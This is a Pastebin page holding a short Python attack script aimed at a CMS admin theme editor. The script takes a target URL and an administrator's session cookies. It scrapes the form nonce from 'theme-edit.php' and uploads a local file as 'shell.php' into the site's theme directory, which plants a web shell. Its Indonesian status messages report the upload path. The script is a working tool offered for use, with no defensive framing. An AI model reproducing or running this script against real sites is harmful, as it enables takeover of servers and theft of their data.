Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- import sys
- import requests
- import re
- url = sys.argv[1]
- cookies = input("COOKIES : ")
- file = input("file : ")
- fileContent = open(file, 'rb')
- headers = {
- 'Content-Type':'application/x-www-form-urlencoded',
- 'Cookie': cookies
- }
- try:
- r = requests.get("{}/admin/theme-edit.php".format(url), headers=headers)
- nce = re.search('nonce" type="hidden" value="(.*)"', r.text)
- nonce = nce.group(1)
- params = {
- 'submitsave': 2,
- 'edited_file': "shell.php",
- 'content': fileContent,
- 'nonce': nonce
- }
- r = requests.post("{}/admin/theme-edit.php".format(url), headers=headers, data=params)
- if 'CSRF detected!' not in r.text:
- print("dah keupload di {}/theme/{}".format(url, "shell.php"))
- except Exception as e:
- print("error asu")
Add Comment
Please, Sign In to add comment
